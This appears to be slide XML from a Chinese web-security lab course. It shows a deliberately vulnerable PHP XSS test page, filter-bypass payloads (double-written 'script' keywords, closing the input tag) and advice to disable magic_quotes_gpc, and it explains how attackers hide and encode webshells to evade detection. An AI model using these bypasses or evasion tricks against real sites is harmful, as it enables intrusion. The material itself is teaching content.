                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>window.alert = function()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>{</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>	confirm("Congratulations~");</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/head&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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9577783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1BFEC09-C411-4C8D-A681-0E601F34CB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1172791" y="303958"/>
            <a:ext cx="10873208" cy="6493130"/>
            <a:chOff x="2546904" y="2964184"/>
            <a:chExt cx="7848872" cy="11157813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2899064" y="3634081"/>
              <a:ext cx="7144552" cy="10044166"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;h1 align=center&gt;--Welcome To The Simple XSS Test--&lt;/h1&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;?php</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>ini_set</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>display_errors</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>", 0);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>$str =</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>strtolower</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>( $_GET["keyword"]);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>$str2=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>str_replace</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>script","",$str</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>$str3=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>str_replace</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>("on","",$str2);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>$str4=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>str_replace</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>("src","",$str3);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>echo "&lt;h2 align=center&gt;Hello ".</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>htmlspecialchars</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>($str).".&lt;/h2&gt;".'&lt;center&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;form action=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                <a:t>xss_test.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t> method=GET&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;input type=submit name=submit value=Submit /&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;input name=keyword  value="'.$str4.'"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/form&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/center&gt;';</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>?&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2546904" y="2964184"/>
              <a:ext cx="7848872" cy="1115781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81601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首先从黑盒测试的角度来进行实验</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http://192.168.19.131/xss_test.php</a:t>
            </a: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页面显示效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD5D958-A7FD-40D0-83A8-1746382F9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471" y="2717297"/>
            <a:ext cx="10759808"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0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38188" y="808013"/>
            <a:ext cx="11233247" cy="162125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如图可以看到一个</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按钮和输入框，并且还有标题提示</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。于是输入上面学过最简单的</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&lt;script&gt;alert('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')&lt;/script&gt;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来进行测试。点击</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Submit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按钮以后，效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6CAB5F8-1D5A-47EA-BFDF-9BD9F6919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188" y="2608213"/>
            <a:ext cx="11209034" cy="338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4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38188" y="808013"/>
            <a:ext cx="11233247" cy="208823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结果发现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后面出现了我们输入的内容，并且输入框中的回显</a:t>
            </a:r>
            <a:r>
              <a:rPr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过滤</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script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关键字，这个时候考虑后台只是最简单的一次过滤。于是可以利用双写关键字绕过，构造脚本：</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&gt;alert('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测试。执行效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64FC434-98BF-44E5-95AE-9110238B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188" y="3112269"/>
            <a:ext cx="11233247" cy="360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241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28775" y="519981"/>
            <a:ext cx="11233247" cy="151216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现虽然输入框中的回显确实是我们想要攻击的脚本，但是代码并没有执行。因为在黑盒测试情况下，我们并不能看到全部代码的整个逻辑，所以无法判断问题到底出在哪里。这个时候我们可以</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在页面点击右键查看源码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，尝试从源码片段中分析问题。右键源码如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A693C72-0C6C-4D1A-ABA6-A950DAD90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35" y="2248173"/>
            <a:ext cx="1185611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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB83474-71C3-4598-A6D1-05CEA4211864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828975" y="2248173"/>
            <a:ext cx="5040560" cy="1127058"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37704"/>
              <a:gd name="adj2" fmla="val 90831"/>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000" b="1" dirty="0"/>
              <a:t>如果可以成功执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>函数的话，页面将会跳出一个确认框，显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>Congratulations~</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="对话气泡: 圆角矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCB91EC-1FAB-4EBA-8454-8611810B7EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581503" y="5488533"/>
            <a:ext cx="5040560" cy="1343082"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74768"/>
              <a:gd name="adj2" fmla="val -2361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zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>分析这行代码知道，虽然我们成功的插入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;script&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>标签组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>但是我们并没有跳出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>的标签，使得我们的脚本仅仅可以回显而不能利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="对话气泡: 圆角矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCB91EC-1FAB-4EBA-8454-8611810B7EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7221462" y="3609387"/>
            <a:ext cx="5040560" cy="1343082"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -102546"/>
              <a:gd name="adj2" fmla="val 67872"/>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b="1" dirty="0" err="1"/>
              <a:t>Htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>函数可以有效防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>脚本攻击，是一个过滤函数，实现预定义字符的转换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420239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38188" y="591989"/>
            <a:ext cx="11233247" cy="18002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这个时候的思路就是</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想办法将前面的</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&lt;input&gt;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标签闭合</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，于是构造如下脚本：</a:t>
            </a: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scrscriptipt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&gt;alert('XSS')&lt;/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scscriptript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&gt;&lt;!—</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弹处确认框，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XSS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攻击成功。执行效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27300B1B-8DFD-4358-9D9D-6A66CF6C0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55" y="2596228"/>
            <a:ext cx="10009112" cy="426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对话气泡: 圆角矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC46F00-65FF-4AF0-B5DC-EBE0D277DD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531091" y="3999593"/>
            <a:ext cx="8690260" cy="266429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150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>重要提醒：如果实践过程出现错误，通常表现为输入的双引号不能正常被处理，是因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>服务器自动会对输入的双引号等进行转义，以预防用户构造特殊输入进行攻击，比如本实验所进行的攻击。为了确保实验可以成功运行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>请在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>phpnow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>安装目录下搜索文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>php-apache2handler.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>，并将“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t> = On”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>设置为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t> = Off”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388254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129749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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WebShell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就是以</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等网页文件形式存在的一种命令执行环境，也可以将其称之为一种网页后门。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F161E4-DC58-4EEF-AEC9-22161DFC6C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="864499"/>
            <a:ext cx="2596493" cy="519578"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="519578"/>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8299" y="1392013"/>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WebShell</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7466DC-3F76-423F-B82E-113424A8F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1224920" y="2752228"/>
            <a:ext cx="4789953" cy="3605203"/>
            <a:chOff x="2324919" y="2752228"/>
            <a:chExt cx="3377545" cy="3243947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C6940C-20D3-4DB5-8A37-C627121ED848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324919" y="2752228"/>
              <a:ext cx="3377545" cy="3243947"/>
              <a:chOff x="2324919" y="2752228"/>
              <a:chExt cx="3377545" cy="3243947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="矩形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC74326-F99E-481C-8211-98CB5E7E3392}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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D058FB5-1BE4-4C4E-A317-52F04D235217}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2462104" y="2896244"/>
                <a:ext cx="3240360" cy="3099931"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8445913E-1A53-40D8-8186-531DFF4E0FDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="2986251"/>
              <a:ext cx="2940318" cy="2298569"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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攻击者在入侵了一个网站后，通常会将这些</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asp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或</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后门文件与网站服务器</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目录下正常的网页文件混在一起，然后使用浏览器来访问这些后门，</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得到一个命令执行环境</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以达到控制网站服务器的目的</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（可以上传下载或者修改文件，操作数据库，执行任意命令等）。</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62005B66-5B95-4155-B037-6DED6A573F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6789415" y="2752229"/>
            <a:ext cx="4968552" cy="3384376"/>
            <a:chOff x="2324918" y="2752228"/>
            <a:chExt cx="3816424" cy="3243947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="组合 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE413F1-A820-4F94-BD9F-2C06B5AC91F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752228"/>
              <a:ext cx="3816424" cy="3243947"/>
              <a:chOff x="2324918" y="2752228"/>
              <a:chExt cx="3816424" cy="3243947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="矩形 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B2615B-8564-423E-94F2-014325EF79F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752228"/>
                <a:ext cx="3679239" cy="309993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D65CCD0-880C-4F5A-9DD6-0ED07DEFC891}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2462103" y="2896244"/>
                <a:ext cx="3679239" cy="309993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41" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997344FC-861C-4F9F-B665-FEF51F1216FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540942" y="2986251"/>
              <a:ext cx="3528964" cy="2743555"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="342900" indent="-342900" algn="just">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pP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后门隐蔽较性高</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，可以轻松穿越防火墙，访问</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时不会留下系统日志，只会在网站的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日志中留下一些数据提交记录，没有经验的管理员不容易发现入侵痕迹。</a:t>
              </a:r>
              <a:endPar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pPr marL="342900" indent="-342900" algn="just">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pP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攻击者可以将</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隐藏在正常文件中并修改文件时间增强隐蔽性</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，也可以采用一些函数对</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进行编码或者拼接以规避检测。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400807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822662" y="1283027"/>
            <a:ext cx="9325035" cy="82112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必须是</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脚本吗？</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5950234" y="837929"/>
              <a:ext cx="95828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扩展思考</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1172791" y="2220781"/>
            <a:ext cx="10873208" cy="3555784"/>
            <a:chOff x="2546904" y="2964184"/>
            <a:chExt cx="7848872" cy="7459026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
